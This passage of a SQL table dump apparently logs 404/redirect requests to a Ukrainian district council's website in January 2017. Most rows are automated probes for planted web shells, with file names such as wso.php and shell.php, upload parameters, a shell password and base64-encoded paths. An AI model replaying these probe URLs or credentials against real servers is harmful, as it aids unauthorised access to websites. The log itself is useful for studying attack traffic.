00:00:00',301),(29114,'http://www.malyn-rayrada.gov.ua/xup.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:31:04','0000-00-00 00:00:00',301),(29115,'http://www.malyn-rayrada.gov.ua/zebda.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:31:04','0000-00-00 00:00:00',301),(29116,'http://www.malyn-rayrada.gov.ua/kk.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:31:04','0000-00-00 00:00:00',301),(29117,'http://www.malyn-rayrada.gov.ua/wp_logns.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-01-13 13:31:04','0000-00-00 00:00:00',301),(29118,'http://malyn-rayrada.gov.ua/libraries/cms/modules.php',NULL,'http://malyn-rayrada.gov.ua/libraries/cms/modules.php','',1,0,'2017-01-13 20:32:38','0000-00-00 00:00:00',301),(29119,'http://www.malyn-rayrada.gov.ua/index.php/1590-spivchuttya-kolezi',NULL,'','',26,0,'2017-01-17 01:11:53','0000-00-00 00:00:00',301),(29120,'http://www.malyn-rayrada.gov.ua/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/logo_img.php','',1,0,'2017-01-17 13:25:42','0000-00-00 00:00:00',301),(29121,'http://malyn-rayrada.gov.ua/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/logo_img.php','',7,0,'2017-01-18 18:08:43','0000-00-00 00:00:00',301),(29122,'http://malyn-rayrada.gov.ua/images/xxu.php',NULL,'','',4,0,'2017-01-18 23:15:57','0000-00-00 00:00:00',301),(29123,'http://malyn-rayrada.gov.ua/x.php',NULL,'','',9,0,'2017-01-18 23:15:58','0000-00-00 00:00:00',301),(29124,'http://malyn-rayrada.gov.ua/images/1ndex.php?z3=TTJPOWNPLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:16:06','0000-00-00 00:00:00',301),(29125,'http://malyn-rayrada.gov.ua/sqlbak.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:16:36','0000-00-00 00:00:00',301),(29126,'http://malyn-rayrada.gov.ua/email.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:17:04','0000-00-00 00:00:00',301),(29127,'http://malyn-rayrada.gov.ua/functions.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:17:20','0000-00-00 00:00:00',301),(29128,'http://malyn-rayrada.gov.ua/cache/news.php?z3=TTJPOWNPLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:18:03','0000-00-00 00:00:00',301),(29129,'http://malyn-rayrada.gov.ua/tmp.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',4,0,'2017-01-18 23:18:18','0000-00-00 00:00:00',301),(29130,'http://malyn-rayrada.gov.ua/configurationbak.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:19:06','0000-00-00 00:00:00',301),(29131,'http://malyn-rayrada.gov.ua/robots.txt.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:19:22','0000-00-00 00:00:00',301),(29132,'http://malyn-rayrada.gov.ua/jconfig.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:19:47','0000-00-00 00:00:00',301),(29133,'http://malyn-rayrada.gov.ua/media/reads.php?z3=TTJPOWNPLnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:19:59','0000-00-00 00:00:00',301),(29134,'http://malyn-rayrada.gov.ua/media/1ndex.php?z3=TTJPOWNPLnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:20:27','0000-00-00 00:00:00',301),(29135,'http://malyn-rayrada.gov.ua/sql_dump.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:20:50','0000-00-00 00:00:00',301),(29136,'http://malyn-rayrada.gov.ua/images/laj.php?z3=TTJPOWNPLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:21:07','0000-00-00 00:00:00',301),(29137,'http://malyn-rayrada.gov.ua/media/404.php?z3=TTJPOWNPLnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:21:37','0000-00-00 00:00:00',301),(29138,'http://malyn-rayrada.gov.ua/media/tmp.php?z3=TTJPOWNPLnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:21:53','0000-00-00 00:00:00',301),(29139,'http://malyn-rayrada.gov.ua/r3x.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:22:10','0000-00-00 00:00:00',301),(29140,'http://malyn-rayrada.gov.ua/log.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:22:19','0000-00-00 00:00:00',301),(29141,'http://malyn-rayrada.gov.ua/images/stories/0day.php?z3=TTJPOWNPLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:22:42','0000-00-00 00:00:00',301),(29142,'http://malyn-rayrada.gov.ua/includes/u2p.php?z3=TTJPOWNPLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:23:23','0000-00-00 00:00:00',301),(29143,'http://malyn-rayrada.gov.ua/images/xxx.php?z3=TTJPOWNPLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:23:43','0000-00-00 00:00:00',301),(29144,'http://malyn-rayrada.gov.ua/al277.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:23:48','0000-00-00 00:00:00',301),(29145,'http://malyn-rayrada.gov.ua/cache/cache_aqbmkwwx.php?z3=TTJPOWNPLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:24:09','0000-00-00 00:00:00',301),(29146,'http://malyn-rayrada.gov.ua/install.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:24:28','0000-00-00 00:00:00',301),(29147,'http://malyn-rayrada.gov.ua/dswat.org/wsdl.php?z3=TTJPOWNPLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:24:59','0000-00-00 00:00:00',301),(29148,'http://malyn-rayrada.gov.ua/robot.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:25:17','0000-00-00 00:00:00',301),(29149,'http://malyn-rayrada.gov.ua/wsdl.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:25:48','0000-00-00 00:00:00',301),(29150,'http://malyn-rayrada.gov.ua/goog1es.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:26:18','0000-00-00 00:00:00',301),(29151,'http://malyn-rayrada.gov.ua/site/tmp/cTivrC.php?z3=TTJPOWNPLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:26:35','0000-00-00 00:00:00',301),(29152,'http://malyn-rayrada.gov.ua/update.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:27:08','0000-00-00 00:00:00',301),(29153,'http://malyn-rayrada.gov.ua/includes.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:27:28','0000-00-00 00:00:00',301),(29154,'http://malyn-rayrada.gov.ua/wp-main.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:28:01','0000-00-00 00:00:00',301),(29155,'http://malyn-rayrada.gov.ua/news.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:28:21','0000-00-00 00:00:00',301),(29156,'http://malyn-rayrada.gov.ua/images/al277.php?z3=TTJPOWNPLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:28:44','0000-00-00 00:00:00',301),(29157,'http://malyn-rayrada.gov.ua/webconfig.txt.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:29:01','0000-00-00 00:00:00',301),(29158,'http://malyn-rayrada.gov.ua/cache/cachee.php?z3=TTJPOWNPLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:29:32','0000-00-00 00:00:00',301),(29159,'http://malyn-rayrada.gov.ua/thumb.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:29:51','0000-00-00 00:00:00',301),(29160,'http://malyn-rayrada.gov.ua/SessionController.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:30:39','0000-00-00 00:00:00',301),(29161,'http://malyn-rayrada.gov.ua/maill.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:30:57','0000-00-00 00:00:00',301),(29162,'http://malyn-rayrada.gov.ua/error-log.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:31:39','0000-00-00 00:00:00',301),(29163,'http://malyn-rayrada.gov.ua/authenticating.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:32:03','0000-00-00 00:00:00',301),(29164,'http://malyn-rayrada.gov.ua/google-assist.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:32:12','0000-00-00 00:00:00',301),(29165,'http://malyn-rayrada.gov.ua/images/google-assist.php?z3=TTJPOWNPLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:32:23','0000-00-00 00:00:00',301),(29166,'http://malyn-rayrada.gov.ua/images/robots.txt.php?z3=TTJPOWNPLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:32:49','0000-00-00 00:00:00',301),(29167,'http://malyn-rayrada.gov.ua/elements.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:33:01','0000-00-00 00:00:00',301),(29168,'http://malyn-rayrada.gov.ua/xmlsrpc.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:33:28','0000-00-00 00:00:00',301),(29169,'http://malyn-rayrada.gov.ua/wp-cache.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:33:44','0000-00-00 00:00:00',301),(29170,'http://malyn-rayrada.gov.ua/images/404.php?z3=TTJPOWNPLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:33:52','0000-00-00 00:00:00',301),(29171,'http://malyn-rayrada.gov.ua/images/head.php?z3=TTJPOWNPLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:34:23','0000-00-00 00:00:00',301),(29172,'http://malyn-rayrada.gov.ua/cache/support.php?z3=TTJPOWNPLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:34:41','0000-00-00 00:00:00',301),(29173,'http://malyn-rayrada.gov.ua/RoseLeif.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:35:01','0000-00-00 00:00:00',301),(29174,'http://malyn-rayrada.gov.ua/Abbrevsprl.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:35:16','0000-00-00 00:00:00',301),(29175,'http://malyn-rayrada.gov.ua/show.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:35:39','0000-00-00 00:00:00',301),(29176,'http://malyn-rayrada.gov.ua/images/defau1t.php?z3=TTJPOWNPLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:35:43','0000-00-00 00:00:00',301),(29177,'http://malyn-rayrada.gov.ua/cli/40dd1d.php?z3=TTJPOWNPLnBocA==&z4=L2NsaS8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:35:50','0000-00-00 00:00:00',301),(29178,'http://malyn-rayrada.gov.ua/infos.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:36:30','0000-00-00 00:00:00',301),(29179,'http://malyn-rayrada.gov.ua/cache/defau1t.php?z3=TTJPOWNPLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:37:02','0000-00-00 00:00:00',301),(29180,'http://malyn-rayrada.gov.ua/bookmark.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:37:17','0000-00-00 00:00:00',301),(29181,'http://malyn-rayrada.gov.ua/configbak.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:37:27','0000-00-00 00:00:00',301),(29182,'http://malyn-rayrada.gov.ua/wp-data.php?z3=TTJPOWNPLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:37:52','0000-00-00 00:00:00',301),(29183,'http://malyn-rayrada.gov.ua/wp-content/plugins/Fbrrchive.php?z3=TTJPOWNPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:38:11','0000-00-00 00:00:00',301),(29184,'http://malyn-rayrada.gov.ua/wp-content/uploads/Fbrrchive.php?z3=TTJPOWNPLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:38:32','0000-00-00 00:00:00',301),(29185,'http://malyn-rayrada.gov.ua/wp-content/plugins/myshe.php?z3=TTJPOWNPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:38:56','0000-00-00 00:00:00',301),(29186,'http://malyn-rayrada.gov.ua/wp-content/plugins/wp-cache.php?z3=TTJPOWNPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:39:14','0000-00-00 00:00:00',301),(29187,'http://malyn-rayrada.gov.ua/wp-content/plugins/wp-footers.php?z3=TTJPOWNPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:39:55','0000-00-00 00:00:00',301),(29188,'http://malyn-rayrada.gov.ua/wp-content/plugins/wpfootes.php?z3=TTJPOWNPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:40:24','0000-00-00 00:00:00',301),(29189,'http://malyn-rayrada.gov.ua/wp-content/plugins/sql_dump.php?z3=TTJPOWNPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:40:40','0000-00-00 00:00:00',301),(29190,'http://malyn-rayrada.gov.ua/wp-content/plugins/SocketIontrol.php?z3=TTJPOWNPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:41:07','0000-00-00 00:00:00',301),(29191,'http://malyn-rayrada.gov.ua/wp-content/plugins/SocketIasrgasfontrol.php?z3=TTJPOWNPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:41:23','0000-00-00 00:00:00',301),(29192,'http://malyn-rayrada.gov.ua/wp-content/plugins/Analyser.php?z3=TTJPOWNPLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:41:57','0000-00-00 00:00:00',301),(29193,'http://malyn-rayrada.gov.ua/cache/list.php?z3=TTJPOWNPLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-01-18 23:42:06','0000-00-00 00:00:00',301),(29194,'http://malyn-rayrada.gov.ua/license.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:42:26','0000-00-00 00:00:00',301),(29195,'http://malyn-rayrada.gov.ua/tmp/sfx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:42:30','0000-00-00 00:00:00',301),(29196,'http://malyn-rayrada.gov.ua/m.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:42:47','0000-00-00 00:00:00',301),(29197,'http://malyn-rayrada.gov.ua/ny.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:42:53','0000-00-00 00:00:00',301),(29198,'http://malyn-rayrada.gov.ua/tmp/guide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:43:00','0000-00-00 00:00:00',301),(29199,'http://malyn-rayrada.gov.ua/media/jss.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:43:03','0000-00-00 00:00:00',301),(29200,'http://malyn-rayrada.gov.ua/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-01-18 23:43:18','0000-00-00 00:00:00',301),(29201,'http://malyn-rayrada.gov.ua/nktt.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:43:27','0000-00-00 00:00:00',301),(29202,'http://malyn-rayrada.gov.ua/zibi.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:43:31','0000-00-00 00:00:00',301),(29203,'http://malyn-rayrada.gov.ua/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:43:32','0000-00-00 00:00:00',301),(29204,'http://malyn-rayrada.gov.ua/ws0.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:43:38','0000-00-00 00:00:00',301),(29205,'http://malyn-rayrada.gov.ua/active.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:43:48','0000-00-00 00:00:00',301),(29206,'http://malyn-rayrada.gov.ua/images/stories/alfa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:43:50','0000-00-00 00:00:00',301),(29207,'http://malyn-rayrada.gov.ua/images/stories/s.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:43:53','0000-00-00 00:00:00',301),(29208,'http://malyn-rayrada.gov.ua/images/stories/black.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:43:58','0000-00-00 00:00:00',301),(29209,'http://malyn-rayrada.gov.ua/images/p.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:44:12','0000-00-00 00:00:00',301),(29210,'http://malyn-rayrada.gov.ua/help.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',6,0,'2017-01-18 23:44:21','0000-00-00 00:00:00',301),(29211,'http://malyn-rayrada.gov.ua/libraries/respectMuslims.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:44:26','0000-00-00 00:00:00',301),(29212,'http://malyn-rayrada.gov.ua/libraries/joomla/zipy.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:44:32','0000-00-00 00:00:00',301),(29213,'http://malyn-rayrada.gov.ua/tmp/pz.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:44:37','0000-00-00 00:00:00',301),(29214,'http://malyn-rayrada.gov.ua/go.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:44:42','0000-00-00 00:00:00',301),(29215,'http://malyn-rayrada.gov.ua/wp-configuration.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:44:51','0000-00-00 00:00:00',301),(29216,'http://malyn-rayrada.gov.ua/images/stories/3xp.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:44:52','0000-00-00 00:00:00',301),(29217,'http://malyn-rayrada.gov.ua/libraries/joomla/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:44:57','0000-00-00 00:00:00',301),(29218,'http://malyn-rayrada.gov.ua/images/stories/xsamxadoo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:45:06','0000-00-00 00:00:00',301),(29219,'http://malyn-rayrada.gov.ua/tmp/petx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:45:11','0000-00-00 00:00:00',301),(29220,'http://malyn-rayrada.gov.ua/tmp/bogel.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:45:20','0000-00-00 00:00:00',301),(29221,'http://malyn-rayrada.gov.ua/images/stories/0d4y.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:45:26','0000-00-00 00:00:00',301),(29222,'http://malyn-rayrada.gov.ua/libraries/joomla/wso.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:45:31','0000-00-00 00:00:00',301),(29223,'http://malyn-rayrada.gov.ua/cache/clean.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:45:36','0000-00-00 00:00:00',301),(29224,'http://malyn-rayrada.gov.ua/images/stories/a.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:45:37','0000-00-00 00:00:00',301),(29225,'http://malyn-rayrada.gov.ua/b1.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:45:43','0000-00-00 00:00:00',301),(29226,'http://malyn-rayrada.gov.ua/mide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:45:51','0000-00-00 00:00:00',301),(29227,'http://malyn-rayrada.gov.ua/wp-content/upgrade/theme-compat/popup-pomo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:46:01','0000-00-00 00:00:00',301),(29228,'http://malyn-rayrada.gov.ua/images/stories/shell.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:46:09','0000-00-00 00:00:00',301),(29229,'http://malyn-rayrada.gov.ua/images/stories/filemga.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:46:11','0000-00-00 00:00:00',301),(29230,'http://malyn-rayrada.gov.ua/images/stories/0day.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:46:18','0000-00-00 00:00:00',301),(29231,'http://malyn-rayrada.gov.ua/default_component.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:46:23','0000-00-00 00:00:00',301),(29232,'http://malyn-rayrada.gov.ua/images/w0rm.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:46:25','0000-00-00 00:00:00',301),(29233,'http://malyn-rayrada.gov.ua/images/sym.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:46:33','0000-00-00 00:00:00',301),(29234,'http://malyn-rayrada.gov.ua/images/wp-mail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:46:37','0000-00-00 00:00:00',301),(29235,'http://malyn-rayrada.gov.ua/media/jmail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:46:38','0000-00-00 00:00:00',301),(29236,'http://malyn-rayrada.gov.ua/images/stories/webroot.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',3,0,'2017-01-18 23:46:50','0000-00-00 